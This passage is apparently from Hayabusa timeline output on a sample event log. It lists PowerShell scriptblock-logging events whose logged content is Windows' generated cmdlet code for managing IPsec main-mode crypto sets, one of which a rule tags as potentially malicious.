$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) 
} } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { 
throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 